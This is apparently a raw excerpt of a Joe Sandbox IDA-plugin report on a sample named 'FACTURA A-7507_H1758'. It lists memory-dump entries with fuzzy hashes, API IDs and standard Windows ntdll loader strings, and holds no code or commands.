                                                                                                                                                                                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                          • API String ID: 0-931879808
                                                                                                                                                                                                                          • Opcode ID: da9aec29faf2b05f4b589e1be2b53bb7e2306cc2f15e448190a613dddce2453f
                                                                                                                                                                                                                          • Instruction ID: 164844b3ce7955e0c9cad48a79b1be8472d84659606cb49d425e10f0e03b27cb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da9aec29faf2b05f4b589e1be2b53bb7e2306cc2f15e448190a613dddce2453f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE31C472B10340ABE7188F54C885F6AB7B9BB44798F41145AF546BB290EF70BE468790
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 354B1D84
                                                                                                                                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 354B1D73
                                                                                                                                                                                                                          • LdrpInitializationFailure, xrefs: 354B1D7A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 0-2986994758
                                                                                                                                                                                                                          • Opcode ID: ae52fe04bc96746d74ce9e800d7797652f8651c0584e14135010d3c91b1f9b6d
                                                                                                                                                                                                                          • Instruction ID: ed8c73d18d4a9145861048cfb651a33fcca5fff5b91f3e8fc280b3a676d8ea99
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae52fe04bc96746d74ce9e800d7797652f8651c0584e14135010d3c91b1f9b6d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF0C276600684ABDB28DA4DDC42F993B78EB41B94F410086FA45B7681CAB0BA00CA90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$@
                                                                                                                                                                                                                          • API String ID: 0-149943524
                                                                                                                                                                                                                          • Opcode ID: 28d4209f0ca491fd6070a4c6b5dcfe29ebf28edf511ca1093d241b863fcdc1ad
                                                                                                                                                                                                                          • Instruction ID: fde01fd8463b48612316e7ce679ab636211889a764c8402235b789c022e7b7e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28d4209f0ca491fd6070a4c6b5dcfe29ebf28edf511ca1093d241b863fcdc1ad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0632ADB46483518BEB1CCF14C480BAEBBE2BF85744F50496EF99687290EB74C945CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: d07a8362df7e4a93c484424914a1babf415e8c31e5aaeb9d2107ba7bb367e11d
                                                                                                                                                                                                                          • Instruction ID: ca3e224eed21d85c300fe41b1790a958cc5c5d844d1e9d677cbf4803d044cb2c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d07a8362df7e4a93c484424914a1babf415e8c31e5aaeb9d2107ba7bb367e11d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5316F35302B02ABE74EDB65C941E8ABB76BF88754F404169E90587B60DB70AD31CBD0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 851ac0e523f7d0a67ea570a2d0ca551742a61301871ee02fc087cb313df3b842
                                                                                                                                                                                                                          • Instruction ID: b9326c6ed79476f8004fe976ce12dd8e2a4fd86446940444b19d424de9716507
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 851ac0e523f7d0a67ea570a2d0ca551742a61301871ee02fc087cb313df3b842
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F911E772B14215ABEF09CF58C984B5EB7B9EB48660F11017EE445E3300DBB0DE01CBA4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$AddD
                                                                                                                                                                                                                          • API String ID: 0-2525844869
                                                                                                                                                                                                                          • Opcode ID: 7a26bc4543c762408daf12117ec4ac6a6e692cd65150c62ea6d98d8c3d67dfd3
                                                                                                                                                                                                                          • Instruction ID: 8fc35d2b4610a9df98381f6a88ba6613da7490879e11127895073549b4f5fcdc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a26bc4543c762408daf12117ec4ac6a6e692cd65150c62ea6d98d8c3d67dfd3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5A17FB5608380AFD719CB14C844FABB7E9FF88744F504A2EF59587250E7B0E905CB62
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • RedirectedKey, xrefs: 3550B60E
                                                                                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3550B5C4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                                                          • API String ID: 0-1388552009
                                                                                                                                                                                                                          • Opcode ID: 47bae6f95a83eb85dd5ec96a1831ee7ca6d2cbc17736d06cb47ca2f55bf25509
                                                                                                                                                                                                                          • Instruction ID: 117aba825e9cf691e19dc7e4bfe3d1c91d231ae3b0dae4a44392b9cbf610261c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47bae6f95a83eb85dd5ec96a1831ee7ca6d2cbc17736d06cb47ca2f55bf25509
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 836115B5C11218EFDB15DFD4D988AEEBBB8FB08714F50406AE805B7240DB34AA45CFA1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @[R5$@[R5@[R5
                                                                                                                                                                                                                          • API String ID: 0-2332972078
                                                                                                                                                                                                                          • Opcode ID: 470b93a760f658558ae8e31e581c6e50d891dabddcf873c746494a1992abe1c1
                                                                                                                                                                                                                          • Instruction ID: ad409a7f7322ba6d844ffd5808afbebf7c53a08b2610ac3e1e6ffda385d4cc66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 470b93a760f658558ae8e31e581c6e50d891dabddcf873c746494a1992abe1c1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51997020A742AFE32ACF24C941B1ABBF4FF48750F14095DF4A98B6A1E775E854CB91
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: $$$
                                                                                                                                                                                                                          • API String ID: 3446177414-233714265
                                                                                                                                                                                                                          • Opcode ID: cd3ae6e9dd76f6797757afc9ca2c37f92bc970b9eb1a2692190d0ff041032de5
                                                                                                                                                                                                                          • Instruction ID: 56a9a69e534ed94925565f6a24930b3ce596c0f1e4fe9b5c1006d09fb95667b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd3ae6e9dd76f6797757afc9ca2c37f92bc970b9eb1a2692190d0ff041032de5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E761ADB5A41749EBFB28CFA4C580BADBBF2BB44704F5044ADD505AB790CB74B981CB90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                                                          • API String ID: 0-118005554
                                                                                                                                                                                                                          • Opcode ID: bb4cbb9eae17f7f4c48ee8e00e467e1e6ae39ad85f68a19ee28402e735ec62ce
                                                                                                                                                                                                                          • Instruction ID: e3f98023bdd7ddb22787f522ce9c0d104b40b8959aa30588def550984fb49492
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb4cbb9eae17f7f4c48ee8e00e467e1e6ae39ad85f68a19ee28402e735ec62ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA31D0B9248740ABD309CB68D880B2AB7F4FFC5710F1408A9F8568B380FB71D905CB52
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: .Local\$@
                                                                                                                                                                                                                          • API String ID: 0-380025441
                                                                                                                                                                                                                          • Opcode ID: 44f408ff3e1418dc83ca73a673c3a2bd05476619c26d9fcc97dc3954ba469fdd
                                                                                                                                                                                                                          • Instruction ID: b627a4a9eb60becbb0bd471e43d2957dd67117cd871e82748eb9db025d2bab8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44f408ff3e1418dc83ca73a673c3a2bd05476619c26d9fcc97dc3954ba469fdd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 643181B564D741AFD319CF28C880B5BBBF8FB85658F40096EF99583250EB34DD098B92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 354A289F
                                                                                                                                                                                                                          • RtlpInitializeAssemblyStorageMap, xrefs: 354A289A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                                                          • API String ID: 0-2653619699
                                                                                                                                                                                                                          • Opcode ID: 4b200f4235ff7a187e94b0e4e0098c8502f77a11c55b8e768dcef4caab191c62
                                                                                                                                                                                                                          • Instruction ID: 062fa0a2c4632a469b84c7d210add6ff9d61426f76d2a3633247e5b4c66b63e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b200f4235ff7a187e94b0e4e0098c8502f77a11c55b8e768dcef4caab191c62
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 931129B2B08315BBF71D8A48CD41F5F76A9EB84754F10806DB904DB344EA74CD0196A0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 43f19fc1f65dee1eeadcc6afa07af917799a271554e2e97aa36b617595e8a1af
                                                                                                                                                                                                                          • Instruction ID: 95bcffa084772b208fc018a4a162c6141cc1cbc5e77a5d1eece485feb31874f7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43f19fc1f65dee1eeadcc6afa07af917799a271554e2e97aa36b617595e8a1af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27229D782087518AEB19CF2AC0A0776F7F1BF45344F54889AE886CB787D775E492CB60
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @[R5@[R5
                                                                                                                                                                                                                          • API String ID: 0-1613323354
                                                                                                                                                                                                                          • Opcode ID: 1a3c40e094623bc4ed1d8c1b1741113cc441530365a44e5b56ae625ad0576769
                                                                                                                                                                                                                          • Instruction ID: 4cf7623e599f4bee3d7165e89185a999da49aeb39d2c086f54e058a286106332
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a3c40e094623bc4ed1d8c1b1741113cc441530365a44e5b56ae625ad0576769
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C132ADB5E01219DBDB18CFA8C881BEEBBB1FF54754F140469E816AB390EB359911CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: fd4cba3a17435d632ed47ad3f3b3d7ebbcff5f3e6402986845837b9aabb3625c
                                                                                                                                                                                                                          • Instruction ID: b63a5d4b7fddc65a6f354971d07d4db59d4748d9cfd22b68b90da42acaf84024
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd4cba3a17435d632ed47ad3f3b3d7ebbcff5f3e6402986845837b9aabb3625c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00B101B56093809FD758CF28C480A5AFBF1BF88304F5489AEF89997352D771E845CB82
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9e7aeb0ac997d6ec1f5b885fbf6e78a0be5949f653f63f21ea8528e3f594d044
                                                                                                                                                                                                                          • Instruction ID: 301a0bd926ab997cfac42081a05fd8ef3ac1eca393fbda79820fee27b09c8317
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e7aeb0ac997d6ec1f5b885fbf6e78a0be5949f653f63f21ea8528e3f594d044
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35812C75B04709ABDB15DFA5CC84EEFBBFCEF48710F100569E565A7290EBB0A9008B60
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5a884ee1897e465cc829c46aee8ca0efe3229fefc3cc9fcae708b11678906083
                                                                                                                                                                                                                          • Instruction ID: b02059dad842a7ab5d37b3183758f6f532c5434e79485db7547657f8acd53fc4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a884ee1897e465cc829c46aee8ca0efe3229fefc3cc9fcae708b11678906083
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87617275B01646AFDB0CCF68C581A9DFBB6BF88350F2481AED459A7310DB30AA518F90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 721b71ec3201d61a8b270383b83974ca6d40d3bfac2e7b5476e21bef92cbc02f
                                                                                                                                                                                                                          • Instruction ID: 5e4984b2bc35522460d93b4ac8b5e24dd3e5f5a90a21fb063bb513dd14b99662
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 721b71ec3201d61a8b270383b83974ca6d40d3bfac2e7b5476e21bef92cbc02f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A231EDB2640614AFD319CF14C880A5A77B5FF44764F5482AEE9459F291CB31ED42CBD0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: cba9ec972cdb46b0670ee94297e51dfc16ee586840119f9583f7c66243e10a87
                                                                                                                                                                                                                          • Instruction ID: 5fbb3adf930ea3b77da0c837e323b73cd94cb1ece1935e6937e045b2549666c4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cba9ec972cdb46b0670ee94297e51dfc16ee586840119f9583f7c66243e10a87
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA319035712A45EFE74ACB64CA81E89BBB6FF88650F405099E80087B61DB31E831CF80
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 5971abd2135046632fd778e27382ac68e8686e630f574068a6aa045b0028d27a
                                                                                                                                                                                                                          • Instruction ID: 4127214f60d14b9d272c0c95aeaabb99ee242b56c0a628958ceb4ddb0c05c8bd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5971abd2135046632fd778e27382ac68e8686e630f574068a6aa045b0028d27a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8621FF7620B6009FE325DF04D945B0ABBB1FB88B51F4900A9E8424B3A0DB70E858CBC1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 935e8fcf778f665eee31addc9c60bebf0d1fbb9b55199d8430dae96317741ae4
                                                                                                                                                                                                                          • Instruction ID: 2e902e7e1800b746790aef1e1cf6cd2cf6347bcdfaba9b67288bc40de23f240c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 935e8fcf778f665eee31addc9c60bebf0d1fbb9b55199d8430dae96317741ae4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B821CDF6A482849FEB0E8F98C540BDDBBB5FF09744F0500AAE8019B391D7B98900D720
